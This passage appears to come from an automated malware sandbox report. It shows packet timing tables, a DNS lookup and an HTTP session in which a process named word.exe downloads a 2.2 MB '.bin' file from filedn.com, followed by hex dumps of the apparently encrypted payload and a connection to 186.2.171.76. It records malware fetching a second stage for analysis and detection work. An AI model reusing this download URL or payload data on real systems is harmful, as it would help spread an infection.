                                                        Aug 22, 2024 16:13:39.243386030 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.246002913 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.246195078 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.247714043 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.247961998 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.251317978 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.251635075 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.251635075 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.254374981 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.254566908 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.256983995 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.257167101 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.261086941 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.261287928 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.261293888 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.261452913 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.266508102 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.266630888 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.266630888 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.266679049 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.266685963 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.266894102 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.270579100 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.270751953 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.270760059 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.270967007 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.279110909 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.279436111 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.279436111 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.279447079 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.279618025 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.284935951 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.285193920 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.285193920 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.288803101 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.289127111 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.289132118 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.289355040 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.293895006 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.294060946 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.294275999 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.294279099 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.294450998 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.298969984 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.299124956 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.299290895 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.303802013 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.304018974 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.311521053 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.311702967 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.311783075 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.311786890 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.311996937 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.315768957 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.315902948 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.315903902 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.315951109 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.315954924 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.316165924 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.321341991 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.321583033 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.326442957 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.326595068 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.326685905 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.326692104 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.326827049 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.329315901 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.329513073 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.329519033 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.329726934 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.334647894 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.334880114 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.337585926 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.337769032 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.341131926 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.341353893 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.341358900 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.341520071 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.346726894 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.346946001 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.346946001 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.347939968 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.348162889 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.350547075 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.350729942 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.355614901 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.355850935 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.358004093 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.358139038 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.361344099 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.361670971 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.361675978 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.361896038 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.366230965 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.366389990 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.366389990 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.366554976 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.366559029 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.366766930 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.370604038 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.370762110 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.370928049 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.370932102 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.371140003 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.376007080 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.376332045 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.376332045 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.377913952 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.378117085 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.380449057 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.380608082 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.380707026 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.384319067 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.384452105 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.384582043 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.386148930 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.386307001 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.390897989 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.391068935 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.391117096 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.391120911 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.391283035 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.396450043 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.396632910 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.396637917 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.396847010 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.400671005 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.400861979 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.400867939 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.401076078 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.406070948 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.406208038 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.406423092 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.406426907 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.406635046 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.410310984 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.410487890 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.410587072 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.415472031 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.415659904 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.415824890 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.416944981 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.417146921 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.421329021 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.421451092 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.421451092 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.421498060 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.421502113 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.421664953 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.425293922 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.425467014 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.425472975 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.425648928 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.430149078 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.430316925 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.430367947 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.433351040 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.433587074 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.440232038 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.440392017 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.440392017 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.440398932 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.440606117 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.446304083 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.446351051 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.446516037 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.470186949 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.470187902 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:39.470243931 CEST4434979474.120.9.25192.168.11.20
                                                        Aug 22, 2024 16:13:39.470448017 CEST49794443192.168.11.2074.120.9.25
                                                        Aug 22, 2024 16:13:45.989012003 CEST49795443192.168.11.20186.2.171.76
                                                        Aug 22, 2024 16:13:45.989037037 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:45.989213943 CEST49795443192.168.11.20186.2.171.76
                                                        Aug 22, 2024 16:13:45.995755911 CEST49795443192.168.11.20186.2.171.76
                                                        Aug 22, 2024 16:13:45.995769024 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:46.509879112 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:46.510114908 CEST49795443192.168.11.20186.2.171.76
                                                        Aug 22, 2024 16:13:46.512209892 CEST49795443192.168.11.20186.2.171.76
                                                        Aug 22, 2024 16:13:46.512218952 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:46.512413979 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:46.523520947 CEST49795443192.168.11.20186.2.171.76
                                                        Aug 22, 2024 16:13:46.564227104 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:47.011137962 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:47.011203051 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:47.011382103 CEST49795443192.168.11.20186.2.171.76
                                                        Aug 22, 2024 16:13:47.011414051 CEST44349795186.2.171.76192.168.11.20
                                                        Aug 22, 2024 16:13:47.011559010 CEST49795443192.168.11.20186.2.171.76
                                                        Aug 22, 2024 16:13:47.044872046 CEST49795443192.168.11.20186.2.171.76
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Aug 22, 2024 16:13:34.782094002 CEST4921753192.168.11.201.1.1.1
                                                        Aug 22, 2024 16:13:34.987310886 CEST53492171.1.1.1192.168.11.20
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Aug 22, 2024 16:13:34.782094002 CEST192.168.11.201.1.1.10xd550Standard query (0)filedn.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Aug 22, 2024 16:13:34.987310886 CEST1.1.1.1192.168.11.200xd550No error (0)filedn.com74.120.9.25A (IP address)IN (0x0001)false
                                                        • filedn.com
                                                        • 186.2.171.76
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.11.204979474.120.9.254438792C:\Users\user\Desktop\word.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-08-22 14:13:35 UTC197OUTGET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: filedn.com
                                                        Cache-Control: no-cache
                                                        2024-08-22 14:13:35 UTC409INHTTP/1.1 200 OK
                                                        Server: CacheHTTPd v1.0
                                                        Date: Thu, 22 Aug 2024 14:13:35 +0000
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 2195008
                                                        Etag: "4332775a73fb77dd181cccae6c1ea0faadd45262"
                                                        Expires: Thu, 22 Aug 2024 20:13:35 +0000
                                                        Content-Disposition: attachment; filename="OdwulMHhYKs243.bin"
                                                        Accept-Ranges: bytes
                                                        Content-Transfer-Encoding: binary
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=30
                                                        2024-08-22 14:13:35 UTC4096INData Raw: b2 d8 40 5b 19 d4 0f 64 c1 0b 3d f8 55 74 a6 39 88 d5 f0 c0 f7 7d a4 e0 66 f3 05 2f 50 dd 00 12 d8 51 8a bd 45 aa a5 bb 6a f2 d6 f3 db 78 fc bc fa 22 50 97 1d 71 0b 99 2e 18 99 14 83 9f 5b da ad 12 e0 ec 1e 6e 42 58 9d 2e fa c4 30 43 0b b0 86 c2 4c a9 c0 5e 1d d3 e6 d8 8b b7 06 57 25 4c 7b 55 1f 4c a3 4b 15 17 1f ec 79 bb fe b8 da 8f 37 5e ec bf 28 1a f5 92 cd 28 2d d2 46 b6 5b 28 d3 f3 e2 ff 03 05 57 3c f5 2a 04 94 17 94 06 fe 37 0e 73 96 3e c7 70 f1 7d 3e 2a 6f 6d 0c 43 1b 29 01 69 54 c8 bb e3 9b 80 b8 ed dc be cd 08 dc 76 5f 7e 1b 68 b8 67 1a 00 e0 eb d8 2b 7e a5 1a 8e 03 74 18 dd a1 9d 73 2c 21 c6 a4 8b e7 e7 73 27 a4 db 26 28 1f 4d fe bc c6 0a 7a bc 90 32 de 68 b9 b6 65 71 30 b2 32 30 eb 7a 55 ad 18 c1 c9 fd 94 69 1d 2e 5b 18 3d 12 9a fb a6 bd eb 48
                                                        Data Ascii: @[d=Ut9}f/PQEjx"Pq.[nBX.0CL^W%L{ULKy7^((-F[(W<*7s>p}>*omC)iTv_~hg+~ts,!s'&(Mz2heq020zUi.[=H
                                                        2024-08-22 14:13:35 UTC4096INData Raw: 87 3d 44 4a b2 35 6e 26 f9 f5 5f 19 bc e7 36 29 eb 25 3c 8b d8 55 c4 15 d1 99 32 c0 04 71 ec 1d 90 43 4b 95 3f f6 e8 c4 bc 0d a7 43 52 4e a9 c4 5e 36 cb b7 dd ab d3 80 57 25 b2 7a 46 12 5d ae 67 1c 17 19 f4 04 2b fc b8 de 8f 31 4f e8 a0 3c 32 70 92 cd 22 50 43 c4 b6 5f 2e d5 f3 64 d9 86 b1 5e fb cb 8a 5d a5 48 b7 52 92 58 06 c2 e4 4c ac 9a 5f 1c 53 0b 1f 0a 65 2b 0f cf 23 0b 35 82 df f9 8a a0 d1 89 da fd 93 5d ea 0a 36 94 17 29 35 6a 10 2e c6 ed d1 34 66 fd 05 9e 1e 09 8b 93 a0 9a 75 e5 50 68 ea 0a e7 e7 79 5a 30 d9 26 cc 19 7e f8 a9 ef bb 7a bc 38 6f 4b 6a 63 b2 63 60 36 ad 3e 42 d3 5a 55 a7 45 57 cb fd 70 58 1b 38 73 dd 3d 12 b0 e8 a1 ac ee 5b 3a c6 77 48 51 1c 86 b2 47 0b 8a 59 52 53 a1 03 5d 8c 59 5f 86 c6 1f 6f 5d 2d 34 d4 0f 40 2d 2e f0 4d 35 3d 87
                                                        Data Ascii: =DJ5n&_6)%<U2qCK?CRN^6W%zF]g+1O<2p"PC_.d^]HRXL_Se+#5]6)5j.4fuPhyZ0&~z8oKjcc`6>BZUEWpX8s=[:wHQGYRS]Y_o]-4@-.M5=
                                                        2024-08-22 14:13:35 UTC4096INData Raw: 81 e5 cf bc 0f af 79 dd 5d da ef 5e 1d d9 c9 ea 8b b7 0c 57 27 37 5a 55 1f 48 b9 24 26 17 1f e6 79 b9 85 99 da 8f 33 2c 74 ba 28 6a 9a af cd 28 27 d2 c4 cd 7a 28 dd e8 4f 9e 59 b1 5e fb d4 90 27 d8 da 75 12 b4 5e 7d 03 a7 3f 9d 17 83 16 7b 3c 0c 0c 68 2d 76 4a 09 3c 31 e8 c3 96 f7 a2 aa 95 fc fa 86 73 5f 1b 30 10 7e 44 95 04 11 24 e0 cb e1 2a 7e a5 69 f1 46 74 12 b9 98 9e 73 fe 56 70 ea b2 e7 e7 79 25 df c6 26 c8 1b 00 c4 b7 c7 30 7a be 1a 2b de 68 69 b4 1e 69 30 b2 36 05 68 5a 55 a7 38 c3 e1 c4 74 49 17 2c 20 4f 3d 12 be 94 9c bd e9 42 35 d5 50 62 5f 0d 82 90 37 1c 8a 59 78 2c b0 03 4c 88 79 56 82 b4 04 41 01 65 f5 ef 0f 40 27 5c 26 4b 2a 60 87 27 37 ff 90 1e ec 16 25 ba 5c 93 94 01 3c fe 43 42 f4 10 e4 45 0a 5e 4b e8 00 bc 98 47 bf 09 eb 08 dc 74 c9 de
                                                        Data Ascii: y]^W'7ZUH$&y3,t(j('z(OY^'u^}?{<h-vJ<1s_0~D$*~iFtsVpy%&0z+hii06hZU8tI, O=B5Pb_7Yx,LyVAe@'\&K*`'7%\<CBE^KGt
                                                        2024-08-22 14:13:35 UTC4096INData Raw: 8d 1f fb ec bf 22 17 fc be e6 28 2f d0 38 b0 68 28 dd ea 2b 7b 01 b1 58 e8 59 81 05 d8 db 90 44 95 fc 58 44 e2 ee 8d 0f 86 be 7b ac 0c 0c 68 0b 4c 25 20 0b 31 ea bb 1c fc a0 a1 ab d6 fa 82 5d fc 18 27 97 ad 46 b5 6b 35 32 ff c4 45 44 10 a5 1a d4 5e ee 12 93 db b7 73 f4 52 09 71 8b e7 e3 5f 0e a6 a0 0f c8 1f 6b 85 04 c7 3a 7e bf 5d f6 de 68 69 9a 73 73 4b 9b 32 6a 56 21 e6 ad 38 c5 ca 92 91 49 1d 24 4f a6 3e 39 bb ed b5 b9 f8 4c 19 c3 78 59 24 24 88 92 48 71 39 59 7c 47 89 6c a9 82 79 5e 8e c6 1d 3a 28 15 9a d0 74 f4 2d 28 e5 67 03 63 d4 32 37 ff 9e 65 5a 00 0d c4 5f fc 7a 01 3e e2 47 2f f6 6b c7 45 08 28 9c 59 00 cc b4 75 d0 ec e1 08 d4 77 1f 79 94 21 ee 19 2a f9 d4 b7 49 70 77 22 d7 4a e7 20 cf 96 da a1 49 17 d1 cf 8d 1d 9e 20 15 f7 c8 d5 bb e8 d4 73 84
                                                        Data Ascii: "(/8h(+{XYDXD{hL% 1]'Fk52ED^sRq_k:~]hissK2jV!8I$O>9LxY$$Hq9Y|Gly^:(t-(gc27eZ_z>G/kE(Yuwy!*Ipw"J I s
                                                        2024-08-22 14:13:35 UTC4096INData Raw: 48 80 18 81 1c 55 22 90 0d 62 2b 1b 60 21 0b 3b e8 cb ed a8 a0 d1 87 d4 f6 80 5b fa 33 ac 1b 7e 40 da 57 10 24 ea eb d8 29 05 8c 1a de 42 0f b9 91 a0 9a 6b 0a 57 61 cd 9a e8 cb 5d 27 a6 a0 77 c8 1f 6b d6 bc c5 3a 7c 94 ae 13 de 6e 0c 8b 65 71 3a b2 30 11 0f 5a 55 a9 10 cd cb fd 72 61 81 2f 5b 5e 52 2f ba fb ac bd e9 4a 4e fe 78 5b 5b 76 29 92 4c 0e 93 a7 7d 50 9a 12 5c ae 57 54 86 bd 4e 41 01 11 b2 cc 0d 40 2b 00 7d 4a 2a 67 c0 26 37 ff 90 1e ec 7b 50 c0 5c 97 b6 0d 3c e8 6d 11 68 11 ee 43 67 11 e7 ed 0a cc b0 74 97 4e e1 08 d8 63 e3 01 e2 20 f8 0e 38 87 47 9b 5d 7a 75 5b 85 63 e7 24 b0 59 7b a1 4d 10 a8 d4 8c 0e 85 3b 04 cf ca d7 c2 d7 a9 55 80 18 92 fc 4e 1d 71 af 25 84 f7 d5 1f 18 ce ce 92 d5 58 60 25 0e a0 f2 00 62 53 1c 76 85 17 2d 68 e7 e8 c2 17 7b
                                                        Data Ascii: HU"b+`!;[3~@W$)BkWa]'wk:|neq:0ZUra/[^R/JNx[[v)L}P\WTNA@+}J*g&7{P\<mhCgtNc 8G]zu[c$Y{M;UNq%X`%bSv-h{
                                                        2024-08-22 14:13:35 UTC4096INData Raw: 9b b9 d8 2b 7a 8d 3e dc 46 72 30 0d a1 9e 75 9b 5d 73 c2 81 e7 e5 08 78 a4 db 22 e0 3c 6d fe b1 ef a6 7b bc 34 7d e3 68 63 bc 65 73 26 9a ec 6a 52 50 55 ad 31 d7 37 fc 67 42 0c 25 77 76 3d 10 c1 a9 a6 bd ed 60 2a d5 78 5d 77 91 89 92 4a 65 81 58 7c 49 8a 01 37 dd 79 54 80 ee 3f 43 01 13 b2 48 0e 40 2b 47 dc 4b 2a 6b af 1b 3e e9 64 1c fd 0c 1c cc 70 d5 9e 03 45 c1 6b 39 f0 6b 59 45 08 28 ca e1 28 e4 b2 76 b9 21 7d 09 de 65 ca 71 bd 5b d1 0a 2f ec aa 2c 5d 70 71 4a f3 48 cf 1d b4 22 dc b2 43 16 af 24 a5 58 94 2a 13 f0 cc d5 d1 cf fc 35 80 18 90 ef 5c 66 38 a6 25 82 c8 e1 1e 19 c8 c4 92 d5 58 2f 25 0e a0 e4 85 48 40 0d 63 ef 9a 23 68 e1 85 11 16 14 c5 f5 30 37 b8 0c 43 e7 b2 24 10 bb a4 ac 94 72 27 56 b1 b2 09 47 33 79 a3 fd fd 8b 42 5c c7 ea b4 40 86 a2 b9
                                                        Data Ascii: +z>Fr0u]sx"<m{4}hces&jRPU17gB%wv=`*x]wJeX|I7yT?CH@+GK*k>dpEk9kYE((v!}eq[/,]pqJH"C$X*5\f8%X/%H@c#h07C$r'VG3yB\@
                                                        2024-08-22 14:13:35 UTC4096INData Raw: 12 de 62 63 b4 1e 12 30 b2 36 7d 3d 8d 55 ad 32 c1 cb e7 5c 20 1d 2e 5d 58 3d 12 90 e8 96 bf e9 72 35 d7 78 5a 5f 0d 99 92 4e 71 a7 59 7c 47 9e fd 4f 88 7f 78 94 c6 1d 3a 2c 15 9a d0 60 a9 2d 28 eb 6d 2a 4a b4 1b 35 fd e9 9e ef 00 0b bd 71 93 9e 05 3c 93 46 39 f4 14 ec 2a e0 2c e7 e7 00 cc 9a 76 bf 1a d1 0b de 18 e1 7a bf 20 f8 0a 2f e8 d3 e0 3f 70 75 5d fc 31 ce 24 b4 26 f6 ac 4f 6f 97 2a 8d 19 ef 8b 15 e3 c7 fa db c3 af 5b 80 18 92 d0 5c 64 68 87 25 80 e4 c1 9c 19 ce c0 84 29 20 29 24 18 8f f1 6c 24 52 1d 72 f4 b6 2f 13 8d fe 3c 12 16 ba b3 b5 36 bc 26 4e e5 c9 35 20 bf a0 d7 53 09 0f 52 9a b7 0b d6 e7 6a b1 e6 ef b0 27 36 c7 ea b0 54 ee 98 bb 1f f5 e1 53 33 ad 41 44 52 35 c3 e0 27 a4 fd 9e 70 9f 75 1f b7 3f cc 44 72 3a a2 41 f8 b5 d0 c9 03 cc 15 9a 2d
                                                        Data Ascii: bc06}=U2\ .]X=r5xZ_NqY|GOx:,`-(m*J5q<F9*,vz /?pu]1$&Oo*[\dh%) )$l$Rr/<6&N5 SRj'6TS3ADR5'pu?Dr:A-
